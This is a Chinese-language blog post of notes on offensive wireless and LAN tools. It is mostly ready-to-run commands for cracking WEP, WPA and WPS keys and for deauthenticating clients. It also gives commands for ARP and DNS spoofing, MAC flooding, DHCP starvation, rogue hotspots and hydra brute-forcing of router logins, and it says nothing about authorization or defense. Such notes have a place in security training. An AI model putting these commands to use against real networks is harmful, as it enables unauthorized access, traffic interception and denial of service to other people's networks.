无线安全工具使用

Aircrack-ng工具:#

  1. airmon-ng start wlan0:无线网卡置于监听模式
  2. 抓包:airodump-ng wlan0mon
    -c 指定信道 -w 写入文件路径 --ivs 保存文件格式 --bssid 指定apmac地址
  3. airepaly-ng:提供各种攻击
  1. aircrack-ng:破解
  2. airserv-ng:网卡连接到指定端口
  3. airdcap-ng:解包
  4. airolib-ng:彩虹表破解创建数据库文件

破解WEP#

  1. 方法1
    捕获数据包airodump-ng -c 8 -w test --ivs wlan0mon
    重放攻击,以便获取大量ivs数据aireplay-ng -3 -b F8:6E:EE:28:C6:BC -h 70:D9:23:D1:4E:5B wlan0mon
    解认证攻击,使其客户端短暂下线aireplay-ng -0 10 -a F8:6E:EE:28:C6:BC -c 70:D9:23:D1:4E:5B wlan0mon
    破解:aircrack-ng test.ivs
  2. 方法2
    wifite工具自动破解
  3. 方法3
    img
    可以伪造无线地址maccchanger -m mac地址 wlan0mon
    伪造接入点 airbase-ng -c 6 --essid "无线名称" -W 1 -N wlan0mon
    然后airodump抓包破解

破解WPA#

只是在抓包时需要抓到握手包
在破解时需要用-w指定字典

使用hashcat破解
aircrack-ng test.cap -j daiwp
hashcat -m 2500 test.hccapx 字典文件 --force

破解WPS#

查看是否开启WPS
wash -i wlan0mon或者wifite
reaver -i wlan0mon -b F8:6E:EE:28:C6:BC -vv

突破MAC地址过滤#

通过macchanger wlan0 -m mac地址修改为允许连接的地址
允许连接的地址可以通过airodump-ng wlan0mon抓包查看正在连接AP的有哪些

查找隐藏的SSID#

  1. 等待有人连接,即可发现。也可以使用airepaly-ng解认证攻击,之后肯定有人连接,即可发现
  2. 暴力破解,发包不断探寻XXSSID是否在

内网探测#

  1. 判断网络存活主机
    nmap -sP 192.168.1.0/24 -PE
    https://www.sohu.com/a/306466583_354899
  2. 判断网络结构traceroute
  3. 对特定设备进行扫描nmap -sT 192.168.1.13

ARP欺骗#

欺骗目标1将目标2的ip解析到攻击机的MAC地址上,欺骗目标2将目标1的ip解析到攻击机的MAC地址上,这样目标1和2之间的通信经过攻击机
echo 1 > /proc/sys/net/ipv4/ip_forward //如果不设置转发,就可以造成对应用户无法上网的攻击
arpspoof -i 攻击机接口eth0 -t 目标1 目标2
arpspoof -i eth0 -t 目标2 目标1
可以通过arp -a查看arp表判断,也可以使用ettercap
ettercap -G启动图形化界面
抓包后添加目标
在工具栏Mitm中选择ARP poisoning
之后可以通过driftnet -i eth0 捕获图片等多媒体数据
通过ferret分析登录数据等

DNS欺骗#

修改文件,设置要欺骗到的IP地址
vim /etc/ettercap/etter.dns
开始欺骗
ettercap -T -q -i eth0 -P dns_spoof

MAC地址洪泛攻击#

macof -i eth0

DHCP地址池耗尽#

DHCP地址有租期,在超时前不会分发给别的主机
yersinia -G
img
img

创建恶意无线热点#

mdk3 wlan0 b -n ssid名称 -a -s 速度200
img

认证洪泛攻击#

伪装成大量客户端去连接AP,使其响应不过来
mdk3 网卡 a -a APMac

解认证攻击#

使其客户端短暂下线
aireplay-ng -0 10 -a F8:6E:EE:28:C6:BC -c 70:D9:23:D1:4E:5B wlan0mon
10为发包数量

访问控制攻击#

抓包,保存为csv格式
airodump-ng -w 写入文件 --output-format csv 网卡
创建规则文件
d /bssid|STA //拒绝STA连bssid,bssid可以为any或特定设备名,STA也如此
a /bssid|STA //允许
调用规则
airdrop-ng -i 网卡 -r 规则文件 -t 抓的包

爆破无线路由登录密码#

hydra -L 用户名字典 -P 密码字典 登录地址

posted @   启林O_o  阅读(197)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· 百万级群聊的设计实践
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
· 永远不要相信用户的输入:从 SQL 注入攻防看输入验证的重要性
点击右上角即可分享
微信分享提示
CONTENTS